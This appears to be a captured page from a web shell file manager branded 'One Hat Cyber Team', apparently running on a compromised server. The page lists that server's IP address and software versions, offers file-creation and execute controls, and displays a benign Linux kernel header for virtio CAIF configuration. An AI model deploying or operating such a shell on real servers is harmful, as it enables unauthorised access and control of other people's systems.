⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.164
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-29-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:29:41 UTC 2025 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
src
/
linux-headers-6.11.0-29
/
include
/
linux
/
View File Name :
virtio_caif.h
/* * Copyright (C) ST-Ericsson AB 2012 * Author: Sjur Brændeland
* * This header is BSD licensed so * anyone can use the definitions to implement compatible remote processors */ #ifndef VIRTIO_CAIF_H #define VIRTIO_CAIF_H #include
struct virtio_caif_transf_config { __virtio16 headroom; __virtio16 tailroom; __virtio32 mtu; u8 reserved[4]; }; struct virtio_caif_config { struct virtio_caif_transf_config uplink, downlink; u8 reserved[8]; }; #endif